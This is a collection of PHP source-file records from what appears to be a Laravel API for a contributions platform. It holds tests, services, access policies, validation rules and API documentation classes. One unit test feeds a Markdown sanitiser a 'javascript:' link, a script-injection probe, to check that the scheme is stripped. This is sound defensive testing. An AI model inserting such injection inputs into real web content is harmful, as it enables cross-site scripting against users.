"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Support;\n\nuse App\\Support\\Markdown;\nuse Tests\\TestCase;\n\nclass MarkdownTest extends TestCase\n{\n /**\n * @var \\App\\Support\\Markdown\n */\n protected $markdown;\n\n protected function setUp(): void\n {\n parent::setUp();\n\n $this->markdown = $this->app->get(Markdown::class);\n }\n\n /** @test */\n public function sanitise_strips_tags(): void\n {\n $results = $this->markdown->sanitise('<h1>Lorem ipsum</h1>');\n\n $this->assertEquals('Lorem ipsum', $results);\n }\n\n /** @test */\n public function sanitise_strips_javascript(): void\n {\n $results = $this->markdown->sanitise('[javascript:alert(\"hello\")](Lorem ipsum)');\n\n $this->assertEquals('[alert(\"hello\")](Lorem ipsum)', $results);\n }\n\n /** @test */\n public function sanitise_trims_spaces(): void\n {\n $results = $this->markdown->sanitise(\" Lorem ipsum\\t\");\n\n $this->assertEquals('Lorem ipsum', $results);\n }\n\n /** @test */\n public function strip_strips_markdown(): void\n {\n $content = $this->markdown->strip(\n \"# This is a heading!\\n\\nThis is a paragraph.\"\n );\n\n $this->assertEquals(\n 'This is a heading! This is a paragraph.',\n $content\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5459940433502197,
"alphanum_fraction": 0.5796241164207458,
"avg_line_length": 19.632652282714844,
"blob_id": "f074c20fb6d895585a1ad962492cb8a56befe8c4",
"content_id": "3d25ea8f96ba160dece471c475f6c00c9e1e501e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1011,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 49,
"path": "/tests/Unit/Rules/UkPhoneNumberTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Rules;\n\nuse App\\Rules\\UkPhoneNumber;\nuse Tests\\TestCase;\n\nclass UkPhoneNumberTest extends TestCase\n{\n /** @test */\n public function it_passes_mobile_number(): void\n {\n $rule = new UkPhoneNumber();\n\n $result = $rule->passes('test', '07700000000');\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_passes_landline_number(): void\n {\n $rule = new UkPhoneNumber();\n\n $result = $rule->passes('test', '01130000000');\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_fails_invalid_number(): void\n {\n $rule = new UkPhoneNumber();\n\n $result = $rule->passes('test', '11111111111');\n\n $this->assertfalse($result);\n }\n\n /** @test */\n public function message_is_correct(): void\n {\n $rule = new UkPhoneNumber();\n\n $this->assertEquals('The :attribute must be a valid UK phone number.', $rule->message());\n }\n}\n"
},
{
"alpha_fraction": 0.5894519090652466,
"alphanum_fraction": 0.5904860496520996,
"avg_line_length": 16.907407760620117,
"blob_id": "37515a5b1b007de98c1a8b588e7313c9d83ad9a1",
"content_id": "a395f7fe166232bdca3b76152a25e09733664c05",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 967,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 54,
"path": "/app/Events/File/FileRequested.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\File;\n\nuse App\\Models\\File;\nuse App\\Models\\FileToken;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass FileRequested\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\File\n */\n protected $file;\n\n /**\n * @var \\App\\Models\\FileToken\n */\n protected $fileToken;\n\n /**\n * FileCreated constructor.\n *\n * @param \\App\\Models\\File $file\n * @param \\App\\Models\\FileToken $fileToken\n */\n public function __construct(File $file, FileToken $fileToken)\n {\n $this->file = $file;\n $this->fileToken = $fileToken;\n }\n\n /**\n * @return \\App\\Models\\File\n */\n public function getFile(): File\n {\n return $this->file;\n }\n\n /**\n * @return \\App\\Models\\FileToken\n */\n public function getFileToken(): FileToken\n {\n return $this->fileToken;\n }\n}\n"
},
{
"alpha_fraction": 0.6805555820465088,
"alphanum_fraction": 0.6822916865348816,
"avg_line_length": 23,
"blob_id": "5baa87c7ac04d21c97e738419719fefb2cd7a5dc",
"content_id": "3f75dbfd659d5f971973c50fa76c095c3497c806",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 576,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 24,
"path": "/app/Http/Filters/NullFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass NullFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param mixed $value\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $value, string $property): Builder\n {\n // Simply return the query, this is intended to be used to allow the filter name.\n\n return $query;\n }\n}\n"
},
{
"alpha_fraction": 0.6372239589691162,
"alphanum_fraction": 0.6378548741340637,
"avg_line_length": 32.02083206176758,
"blob_id": "1ae18fd35aa53a4d9f45805a7c710478503522a3",
"content_id": "1c90c41299ef9fe09c5e8074801ab68e25254486",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1585,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 48,
"path": "/app/Docs/Operations/Admins/StoreAdminOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Admins;\n\nuse App\\Docs\\Schemas\\Admin\\AdminSchema;\nuse App\\Docs\\Schemas\\Admin\\StoreAdminSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\AdminsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\RequestBody;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass StoreAdminOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_POST)\n ->summary('Create an admin')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(AdminsTag::create())\n ->requestBody(\n RequestBody::create()->content(\n MediaType::json()->schema(StoreAdminSchema::create())\n )\n )\n ->responses(\n Response::created()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, AdminSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5484536290168762,
"alphanum_fraction": 0.5487972497940063,
"avg_line_length": 27.52941131591797,
"blob_id": "6e3e81364be128556e2b2da70c2cf482a7f88e5a",
"content_id": "8e4ffe76ee66d55fbaba1eb06d1a215f6323368e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2910,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 102,
"path": "/app/Services/EndUserService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\EndUser\\EndUserCreated;\nuse App\\Events\\EndUser\\EndUserForceDeleted;\nuse App\\Events\\EndUser\\EndUserSoftDeleted;\nuse App\\Events\\EndUser\\EndUserUpdated;\nuse App\\Models\\EndUser;\nuse App\\Models\\User;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Hash;\n\nclass EndUserService\n{\n /**\n * @param array $data\n * @return \\App\\Models\\EndUser\n */\n public function create(array $data): EndUser\n {\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = EndUser::create([\n 'user_id' => User::create([\n 'email' => $data['email'],\n 'password' => Hash::make($data['password']),\n ])->id,\n 'country' => $data['country'] ?? null,\n 'birth_year' => $data['birth_year'] !== null ? (int)$data['birth_year'] : null,\n 'gender' => $data['gender'] ?? null,\n 'ethnicity' => $data['ethnicity'] ?? null,\n 'gdpr_consented_at' => Date::now(),\n ]);\n\n event(new EndUserCreated($endUser));\n\n return $endUser;\n }\n\n /**\n * @param \\App\\Models\\EndUser $endUser\n * @param array $data\n * @return \\App\\Models\\EndUser\n */\n public function update(EndUser $endUser, array $data): EndUser\n {\n $endUser->update([\n 'country' => $data['country'] ?? $endUser->country,\n 'birth_year' => $data['birth_year'] ?? $endUser->birth_year,\n 'gender' => $data['gender'] ?? $endUser->gender,\n 'ethnicity' => $data['ethnicity'] ?? $endUser->ethnicity,\n ]);\n\n $endUser->user->update([\n 'email' => $data['email'] ?? $endUser->user->email,\n 'password' => $data['password'] !== null\n ? Hash::make($data['password'])\n : $endUser->user->password,\n ]);\n\n event(new EndUserUpdated($endUser));\n\n return $endUser;\n }\n\n /**\n * @param \\App\\Models\\EndUser $endUser\n * @throws \\Exception\n * @return \\App\\Models\\EndUser\n */\n public function softDelete(EndUser $endUser): EndUser\n {\n $endUser->user->delete();\n\n event(new EndUserSoftDeleted($endUser));\n\n return $endUser;\n }\n\n /**\n * @param \\App\\Models\\EndUser $endUser\n * @throws \\Exception\n */\n public function forceDelete(EndUser $endUser): void\n {\n DB::table('contribution_tag')\n ->whereIn('contribution_id', $endUser->contributions()->pluck('id'))\n ->delete();\n $endUser->contributions()->delete();\n /** @var \\App\\Models\\User $user */\n $user = $endUser->user;\n $user->audits()->delete();\n $user->notifications()->delete();\n $endUser->delete();\n $user->forceDelete();\n\n event(new EndUserForceDeleted($endUser));\n }\n}\n"
},
{
"alpha_fraction": 0.695652186870575,
"alphanum_fraction": 0.6969696879386902,
"avg_line_length": 27.11111068725586,
"blob_id": "3dc352f12bd314e80f81862bb2bec8893a4f3ed0",
"content_id": "351c1db7e1529292c58cc37332c7eeaac9048c18",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 759,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 27,
"path": "/app/Docs/Paths/Audits/AuditsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Audits;\n\nuse App\\Docs\\Operations\\Audits\\IndexAuditOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass AuditsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/audits')\n ->operations(\n IndexAuditOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6804123520851135,
"alphanum_fraction": 0.6907216310501099,
"avg_line_length": 8.699999809265137,
"blob_id": "6c0250dd82b553c83e1c166ef8bc553dd5a0b474",
"content_id": "61c5dacf57d6fb4dceb84c40b0419046b46082df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 97,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 10,
"path": "/tests/Stubs/Exporters/TestExporter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Stubs\\Exporters;\n\nclass TestExporter\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5525087714195251,
"alphanum_fraction": 0.5542590618133545,
"avg_line_length": 23.840579986572266,
"blob_id": "2d1f5f34447737578943b4c596c1cfbfdf1b92c2",
"content_id": "1fc40a84da92f1d4c610884043560cd8c64128ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1714,
"license_type": "permissive",
"max_line_length": 143,
"num_lines": 69,
"path": "/app/Rules/Password.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Rules;\n\nuse Illuminate\\Contracts\\Validation\\Rule;\n\nclass Password implements Rule\n{\n const ALLOWED_SPECIAL_CHARACTERS = '!\"#$%&\\'()*+,-./:;<=>?@[]^_`{|}~';\n\n /**\n * Determine if the validation rule passes.\n *\n * @param string $attribute\n * @param string $password\n * @return bool\n */\n public function passes($attribute, $password): bool\n {\n return preg_match($this->regex(), $password) > 0;\n }\n\n /**\n * Get the validation error message.\n *\n * @return string\n */\n public function message(): string\n {\n $specialCharacters = static::ALLOWED_SPECIAL_CHARACTERS;\n\n $message = <<<EOT\n The :attribute must be at least eight characters long, \n contain one uppercase letter, \n one lowercase letter, \n one number and one special character ({$specialCharacters}).\n EOT;\n\n return str_replace(PHP_EOL, '', $message);\n }\n\n /**\n * Returns the regex for the password.\n *\n * @return string\n */\n protected function regex(): string\n {\n return \"/^(?=.*[a-z])(?=.*[A-Z])(?=.*\\d)(?=.*[{$this->escapedSpecialCharacters()}])[A-Za-z\\d{$this->escapedSpecialCharacters()}]{8,}/\";\n }\n\n /**\n * Returns the special characters escaped for the regex.\n *\n * @return string\n */\n protected function escapedSpecialCharacters(): string\n {\n $characters = str_split(static::ALLOWED_SPECIAL_CHARACTERS);\n\n return collect($characters)\n ->map(function (string $character): string {\n return '\\\\' . $character;\n })\n ->implode('');\n }\n}\n"
},
{
"alpha_fraction": 0.6554967761039734,
"alphanum_fraction": 0.6560846567153931,
"avg_line_length": 33.71428680419922,
"blob_id": "5f758752e220e6c51e5d1e6f0c42e4571df60cb7",
"content_id": "d8ded29f255fac58d83a7e595995cc6619a48fb2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1701,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 49,
"path": "/app/Docs/Operations/Contributions/StoreContributionOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Contributions;\n\nuse App\\Docs\\Schemas\\Contribution\\ContributionSchema;\nuse App\\Docs\\Schemas\\Contribution\\StoreContributionSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\ContributionsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\RequestBody;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass StoreContributionOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_POST)\n ->summary('Create a contribution')\n ->description(\n Utils::operationDescription([EndUser::class])\n )\n ->tags(ContributionsTag::create())\n ->requestBody(\n RequestBody::create()->content(\n MediaType::json()->schema(StoreContributionSchema::create())\n )\n )\n ->responses(\n Response::created()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, ContributionSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6897959113121033,
"alphanum_fraction": 0.6909620761871338,
"avg_line_length": 29.625,
"blob_id": "fa74c5aae4ac8f27e3e49733994c71705aeaead7",
"content_id": "043821caf78ba95b30db6bfa150f8d174ea614d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1715,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 56,
"path": "/app/Http/Controllers/V1/Contribution/ApproveController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\Contribution;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Resources\\ContributionResource;\nuse App\\Models\\Contribution;\nuse App\\Services\\ContributionService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass ApproveController extends ApiController\n{\n /**\n * ApproveController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Services\\ContributionService $contributionService\n * @param \\App\\Models\\Contribution $contribution\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function __invoke(\n Request $request,\n ContributionService $contributionService,\n Contribution $contribution\n ): JsonResource {\n $this->authorize('approve', $contribution);\n\n $contribution = DB::transaction(\n function () use ($contributionService, $contribution): Contribution {\n return $contributionService->approve($contribution);\n }\n );\n\n event(EndpointInvoked::onUpdate($request, \"Approved contribution [{$contribution->id}].\"));\n\n return new ContributionResource($contribution);\n }\n}\n"
},
{
"alpha_fraction": 0.5698486566543579,
"alphanum_fraction": 0.5704307556152344,
"avg_line_length": 19.698795318603516,
"blob_id": "aaa558c4b768b4b84c6aed4239cf1e3a6dd69680",
"content_id": "8b27c676e08b5a152fb608e564427832790848b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1718,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 83,
"path": "/app/Policies/AdminPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\Admin;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass AdminPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list admins.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function list(User $user): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can view the admin.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Admin $admin\n * @return bool\n */\n public function view(User $user, Admin $admin): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can create admins.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function create(User $user): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can update the admin.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Admin $admin\n * @return bool\n */\n public function update(User $user, Admin $admin): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can delete the admin.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Admin $admin\n * @return bool\n */\n public function delete(User $user, Admin $admin): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can view the authenticated admin.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function me(User $user): bool\n {\n return $user->isAdmin();\n }\n}\n"
},
{
"alpha_fraction": 0.5981651544570923,
"alphanum_fraction": 0.60550457239151,
"avg_line_length": 21.70833396911621,
"blob_id": "d42c4f72ff9c769971df1bed198207c947996e31",
"content_id": "3f84bdcc1dfbb18b8f7d581f6b39f28c7ed12151",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 545,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 24,
"path": "/app/Http/Requests/Tag/StoreTagRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Tag;\n\nuse App\\Rules\\ParentTagIsTopLevel;\nuse Illuminate\\Foundation\\Http\\FormRequest;\n\nclass StoreTagRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'parent_tag_id' => ['bail', 'present', 'nullable', 'exists:tags,id', new ParentTagIsTopLevel()],\n 'name' => ['bail', 'required', 'string', 'max:255'],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6903409361839294,
"alphanum_fraction": 0.6931818127632141,
"avg_line_length": 17.526315689086914,
"blob_id": "569e279c652499b2dcf4e3f16f97ee85f88bb8c8",
"content_id": "e104f8a97e280ba902ff43baf9337f2e86750fef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 352,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 19,
"path": "/app/Models/Relationships/AdminRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\User;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\n\ntrait AdminRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function user(): BelongsTo\n {\n return $this->belongsTo(User::class);\n }\n}\n"
},
{
"alpha_fraction": 0.6213592290878296,
"alphanum_fraction": 0.6225728392601013,
"avg_line_length": 22.542856216430664,
"blob_id": "9879320cd4838373f03f1a1329f6641162f8a9fa",
"content_id": "c20642834658a3fd244c79b8537505e73cd739bd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 824,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 35,
"path": "/database/migrations/2019_05_29_100642_create_audit_actions_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateAuditActionsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('audit_actions', function (Blueprint $table): void {\n $table->string('action')->primary();\n });\n\n $auditActionsPath = realpath(dirname(__DIR__)) . '/storage/audit_actions.json';\n\n DB::table('audit_actions')->insert(\n json_decode(file_get_contents($auditActionsPath), true)\n );\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('audit_actions');\n }\n}\n"
},
{
"alpha_fraction": 0.5661971569061279,
"alphanum_fraction": 0.5665493011474609,
"avg_line_length": 38.44444274902344,
"blob_id": "0bf2498f84a4802d350c5dd5560f304fd14dd819",
"content_id": "f65a028706aa3b889c173508ad93f190fb45a8b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2840,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 72,
"path": "/app/Docs/Operations/EndUser/IndexEndUserOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\EndUser;\n\nuse App\\Docs\\Parameters\\FilterParameter;\nuse App\\Docs\\Parameters\\PageParameter;\nuse App\\Docs\\Parameters\\PerPageParameter;\nuse App\\Docs\\Parameters\\SortParameter;\nuse App\\Docs\\Schemas\\EndUser\\EndUserSchema;\nuse App\\Docs\\Schemas\\PaginationSchema;\nuse App\\Docs\\Tags\\EndUsersTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass IndexEndUserOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all end users')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(EndUsersTag::create())\n ->parameters(\n PageParameter::create(),\n PerPageParameter::create(),\n FilterParameter::create(null, 'id')\n ->description('The IDs of the end users to filter by')\n ->schema(Schema::string())\n ->style(FilterParameter::STYLE_SIMPLE),\n FilterParameter::create(null, 'email')\n ->description('The email of the end user to filter by')\n ->schema(Schema::string()),\n FilterParameter::create(null, 'email_verified')\n ->description('The email verification status of the End User to filter by')\n ->schema(\n Schema::string()\n ->enum('true', 'false', 'all')\n ->default('all')\n ),\n FilterParameter::create(null, 'with_soft_deletes')\n ->description('The soft deletion status of the End User to filter by')\n ->schema(\n Schema::string()\n ->enum('true', 'false')\n ->default('false')\n ),\n SortParameter::create(null, ['email'], 'email')\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n PaginationSchema::create(null, EndUserSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6409124135971069,
"alphanum_fraction": 0.6416482925415039,
"avg_line_length": 30.604650497436523,
"blob_id": "ba8fe1fa8e4a43c9bb6c362d98435f1bcd12e0e5",
"content_id": "9848a609f30dcd5559c4d471b6cf8a9c0a0ea38d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1359,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 43,
"path": "/app/Docs/Operations/Tags/ShowTagOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Tags;\n\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Schemas\\Tag\\TagSchema;\nuse App\\Docs\\Tags\\TagsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowTagOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific tag')\n ->description(\n Utils::operationDescription(['Public', Admin::class, EndUser::class])\n )\n ->tags(TagsTag::create())\n ->noSecurity()\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, TagSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6970803141593933,
"alphanum_fraction": 0.698296844959259,
"avg_line_length": 28.35714340209961,
"blob_id": "098bf671b0ccf38e7762c5ccb3c6992f5500768a",
"content_id": "36be8128b6013360cbf05e62bafeebc832b160f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 822,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 28,
"path": "/app/Docs/Paths/Admins/AdminsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Admins;\n\nuse App\\Docs\\Operations\\Admins\\IndexAdminOperation;\nuse App\\Docs\\Operations\\Admins\\StoreAdminOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass AdminsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/admins')\n ->operations(\n IndexAdminOperation::create(),\n StoreAdminOperation::create()\n );\n }\n}\n"
},
{
